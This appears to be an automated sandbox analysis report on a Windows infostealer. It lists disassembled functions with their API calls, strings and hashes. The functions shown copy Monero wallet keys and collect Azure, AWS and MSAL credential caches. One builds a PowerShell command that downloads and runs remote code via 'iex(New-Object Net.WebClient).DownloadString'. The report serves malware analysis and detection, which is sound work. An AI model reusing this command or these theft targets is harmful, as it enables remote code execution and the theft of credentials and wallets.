                            • lstrcpy.KERNEL32(00000000,?), ref: 00D74653
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7467B
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D746AF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                            • String ID: .metadata-v2$\storage\default\
                            • API String ID: 1033685851-762053450
                            • Opcode ID: 72dee71e767faf22ae3b3d69f8c9b3584f91a52d9fb0d5d58002db594fa80203
                            • Instruction ID: f6d623678695e2bafe7505b55bf202ba4d35585470b6eac50e8b70fddc18c865
                            • Opcode Fuzzy Hash: 72dee71e767faf22ae3b3d69f8c9b3584f91a52d9fb0d5d58002db594fa80203
                            • Instruction Fuzzy Hash: 7FB19431A126169BCB22EFB8DD49AAE77B8EF44300F094129F849D7251EB74DD018BB0
                            Function 00D757A0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D757D5
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00D75804
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D75835
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7585D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D75868
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D75890
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D758C8
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D758D3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D758F8
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7592E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D75956
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D75961
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D75988
                            • lstrlen.KERNEL32(00D91794), ref: 00D7599A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D759B9
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D759C5
                            • lstrlen.KERNEL32(00BFCD80), ref: 00D759D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D759F7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D75A02
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D75A2C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D75A58
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00D75A5F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D75AB7
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D75B2D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D75B56
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D75B89
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D75BB5
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D75BEF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D75C4C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D75C70
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 2428362635-0
                            • Opcode ID: 2d134bd3248002fbe6d0dc9a204ddb8397772b641bda12b94f271a7aaa0bfe48
                            • Instruction ID: 48cfd9e62db33765297081b07b2352a78c86a62b3e393492cbd5f8c212afed47
                            • Opcode Fuzzy Hash: 2d134bd3248002fbe6d0dc9a204ddb8397772b641bda12b94f271a7aaa0bfe48
                            • Instruction Fuzzy Hash: 9902B571911A099FCB21EFA8D889AAE77B5EF44300F18812DF809D7254EBB4DD45CBB1
                            Function 00D61190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D61120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D61135
                              • Part of subcall function 00D61120: RtlAllocateHeap.NTDLL(00000000), ref: 00D6113C
                              • Part of subcall function 00D61120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00D61159
                              • Part of subcall function 00D61120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00D61173
                              • Part of subcall function 00D61120: RegCloseKey.ADVAPI32(?), ref: 00D6117D
                            • lstrcat.KERNEL32(?,00000000), ref: 00D611C0
                            • lstrlen.KERNEL32(?), ref: 00D611CD
                            • lstrcat.KERNEL32(?,.keys), ref: 00D611E8
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6121F
                            • lstrlen.KERNEL32(00BF8F90), ref: 00D6122D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61251
                            • lstrcat.KERNEL32(00000000,00BF8F90), ref: 00D61259
                            • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00D61264
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61288
                            • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00D61294
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D612BA
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D612FF
                            • lstrlen.KERNEL32(00BFCD98), ref: 00D6130E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61335
                            • lstrcat.KERNEL32(00000000,?), ref: 00D6133D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61378
                            • lstrcat.KERNEL32(00000000), ref: 00D61385
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D613AC
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00D613D5
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61401
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6143D
                              • Part of subcall function 00D7EDE0: lstrcpy.KERNEL32(00000000,?), ref: 00D7EE12
                            • DeleteFileA.KERNEL32(?), ref: 00D61471
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                            • String ID: .keys$\Monero\wallet.keys
                            • API String ID: 2881711868-3586502688
                            • Opcode ID: 2b4e717b33cdae5696cd216ee16495238fa23b9fd8b3ecf83dc1e7628646e7e5
                            • Instruction ID: 96b9ec80955ef9ed156d08b7291482c51e6d4e6dac557d38751f700d92696b4c
                            • Opcode Fuzzy Hash: 2b4e717b33cdae5696cd216ee16495238fa23b9fd8b3ecf83dc1e7628646e7e5
                            • Instruction Fuzzy Hash: 5EA1A575A1161A9BCB21EFB4DC4AAAE77B9EF48300F0C4029F905E7251DB70DD458BB4
                            Function 00D7E720 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 00D7E740
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00D7E769
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7E79F
                            • lstrcat.KERNEL32(?,00000000), ref: 00D7E7AD
                            • lstrcat.KERNEL32(?,\.azure\), ref: 00D7E7C6
                            • memset.MSVCRT ref: 00D7E805
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00D7E82D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7E85F
                            • lstrcat.KERNEL32(?,00000000), ref: 00D7E86D
                            • lstrcat.KERNEL32(?,\.aws\), ref: 00D7E886
                            • memset.MSVCRT ref: 00D7E8C5
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00D7E8F1
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7E920
                            • lstrcat.KERNEL32(?,00000000), ref: 00D7E92E
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00D7E947
                            • memset.MSVCRT ref: 00D7E986
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$memset$FolderPathlstrcpy
                            • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 4067350539-3645552435
                            • Opcode ID: c79a1aa9a9cae533baac2e05e600e53960aeb1a35249b71e56a45f5ab33260a9
                            • Instruction ID: 5e53e67e03714e34edb15f89a14231ffa1c05323247c4196033bce4f7acec469
                            • Opcode Fuzzy Hash: c79a1aa9a9cae533baac2e05e600e53960aeb1a35249b71e56a45f5ab33260a9
                            • Instruction Fuzzy Hash: 1F71E871A50219AFDB21EBB4DC46FFD7374EF48700F444499B7199B181EAB09A888B74
                            Function 00D7ABB2 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 297stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32 ref: 00D7ABCF
                            • lstrlen.KERNEL32(00BFDEE0), ref: 00D7ABE5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7AC0D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D7AC18
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7AC41
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7AC84
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D7AC8E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7ACB7
                            • lstrlen.KERNEL32(00D94AD4), ref: 00D7ACD1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7ACF3
                            • lstrcat.KERNEL32(00000000,00D94AD4), ref: 00D7ACFF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7AD28
                            • lstrlen.KERNEL32(00D94AD4), ref: 00D7AD3A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7AD5C
                            • lstrcat.KERNEL32(00000000,00D94AD4), ref: 00D7AD68
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7AD91
                            • lstrlen.KERNEL32(00BFDF40), ref: 00D7ADA7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7ADCF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D7ADDA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7AE03
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7AE3F
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D7AE49
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7AE6F
                            • lstrlen.KERNEL32(00000000), ref: 00D7AE85
                            • lstrcpy.KERNEL32(00000000,00BFDF88), ref: 00D7AEB8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen
                            • String ID: f
                            • API String ID: 2762123234-1993550816
                            • Opcode ID: 3c3acca1c84737efce013f581625ac6a0d8fb123dc53955bdb3c33a953cdd126
                            • Instruction ID: acca2ce5d4fd38711a275514d820b747d77b1e31e8908dafc9a324c68e45275c
                            • Opcode Fuzzy Hash: 3c3acca1c84737efce013f581625ac6a0d8fb123dc53955bdb3c33a953cdd126
                            • Instruction Fuzzy Hash: 8AB1603091151A9BCB22EBA8DC49ABF77B9FF84300F094529B81997251EB74DD41CBB1
                            Function 00D847E0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(ws2_32.dll,?,00D772A4), ref: 00D847E6
                            • GetProcAddress.KERNEL32(00000000,connect), ref: 00D847FC
                            • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 00D8480D
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00D8481E
                            • GetProcAddress.KERNEL32(00000000,htons), ref: 00D8482F
                            • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00D84840
                            • GetProcAddress.KERNEL32(00000000,recv), ref: 00D84851
                            • GetProcAddress.KERNEL32(00000000,socket), ref: 00D84862
                            • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00D84873
                            • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00D84884
                            • GetProcAddress.KERNEL32(00000000,send), ref: 00D84895
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                            • API String ID: 2238633743-3087812094
                            • Opcode ID: b0ae30b1ec571d308c6071214b584bacc90e8404878a94ab2ece59bde77bfc69
                            • Instruction ID: 417ddd9cd89179828132232a2d6446c51ffbe5a7060d03169693ea2e7e998a67
                            • Opcode Fuzzy Hash: b0ae30b1ec571d308c6071214b584bacc90e8404878a94ab2ece59bde77bfc69
                            • Instruction Fuzzy Hash: D911527195A718AFCB32EFF8BC1DA453AB8BA0A745305082FF161E2174DAF44019FB60
                            Function 00D7BE20 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7BE53
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7BE86
                            • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00D7BE91
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7BEB1
                            • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00D7BEBD
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7BEE0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D7BEEB
                            • lstrlen.KERNEL32(')"), ref: 00D7BEF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7BF13
                            • lstrcat.KERNEL32(00000000,')"), ref: 00D7BF1F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7BF46
                            • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00D7BF66
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7BF88
                            • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00D7BF94
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7BFBA
                            • ShellExecuteEx.SHELL32(?), ref: 00D7C00C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 4016326548-898575020
                            • Opcode ID: 5f4546ffbfd3b0eb57039e3c16e46a238185663c64ee817b2434639ca9962233
                            • Instruction ID: 86289b65b23189fd4e87a78445e1e7abef0281f35114efd9be6a711144099658
                            • Opcode Fuzzy Hash: 5f4546ffbfd3b0eb57039e3c16e46a238185663c64ee817b2434639ca9962233
                            • Instruction Fuzzy Hash: 4A61A431A116199FCB21EFB88C496AE7BB8EF44710F08542BF509D7211EB74C9428BB0
                            Function 00D81820 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D8184F
                            • lstrlen.KERNEL32(00BE7660), ref: 00D81860
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D81887
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D81892
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D818C1
                            • lstrlen.KERNEL32(00D94FA0), ref: 00D818D3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D818F4
                            • lstrcat.KERNEL32(00000000,00D94FA0), ref: 00D81900
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D8192F
                            • lstrlen.KERNEL32(00BF8E50), ref: 00D81945
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D8196C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D81977
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D819A6
